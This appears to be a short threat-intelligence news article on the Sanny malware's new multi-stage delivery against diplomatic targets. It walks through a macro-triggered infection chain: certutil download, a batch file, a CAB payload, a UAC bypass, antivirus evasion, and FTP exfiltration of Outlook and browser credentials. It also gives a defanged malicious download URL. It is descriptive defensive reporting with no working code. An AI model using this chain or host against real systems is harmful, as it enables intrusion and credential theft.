Sanny malware adapts and reemerges
   Â
Hackers behind the Sanny malware have changed the way it delivers its payload. The attackers have upgraded their delivery methods when it comes to planting malware on systems via document attachments sent as part of spam and phishing campaigns. Sanny is now carried out in multiple stages, with each stage being downloaded from the attacker's server. Command line commands, the ability to infect systems running Windows 10, and use of recent User Account Control bypass techniques have also been added. The previous method used to spread Sanny malware was not multi stage. All the components were dropped directly on the disk and executed by the macro based document in the previous variants.
   Â
The attackers, have targeted English and Russian-language diplomatic computers around the world since 2012. The attacks are using both rigged Cyrillic and English-language Word files. The malicious file contains an embedded macro that, when enabled, triggers an infection chain that delivers the Sanny malware payload.
   Â
When victims enable the macro when opening a Word attachment, it triggers the first state of its delivery mehtod. An analysis of the macro revealed that a Text Box found in the Word document runs a hidden malicious command. This TextBox property is first accessed by the macro to execute the command on the system and is then overwritten to delete evidence of the command line. Next, the macro leverages the legitimate Microsoft Windows certutil.exe utility to download an encoded Windows Batch file from the following URL, http://more.1apps(.)com/1.txt. The macro then decodes the encoded file and drops it in the temp directory with the name, 1.bat. The bat file will download the CAB file based on the architecture of the operating system. The rest of the malicious activities are performed by the downloaded CAB file. Normally, CAB files store data related to various Windows installations including device drivers or system files. In the case of Sanny, the CAB file contains several malicious functions including delivering ipnet.dlle, the Sanny malware and ipnet.ini, a configuration file used by Sanny. The maliciou CAB also includes update.dll, which is used to execute a Windows 10 User Account Control bypass. The bat file also checks if specific antivirus software is installed on the victims' systems. If found, CAB installation is changed accordingly in an attempt to bypass detection. Once finally in, the malware gahters everything from Microsoft Outlook accounts and browser data that stores username and passwords. Sanny then sends the data to the attacker's command and control server by ftp.
   Â
Sanny malware doesn't use an archiving utility, the malware uses Shell.Application COM object and calls the CopyHere method of the IShellDispatch interface to perform compression. This shows that the hackers using Sanny malware are evolving their malware delivery methods, by incorporating UAC bypasses and endpoint evasion methods. By using a multi-stage attack with a modular architecture, the malware creators increase the difficulty of reverse engineering and potentially evade security solutions.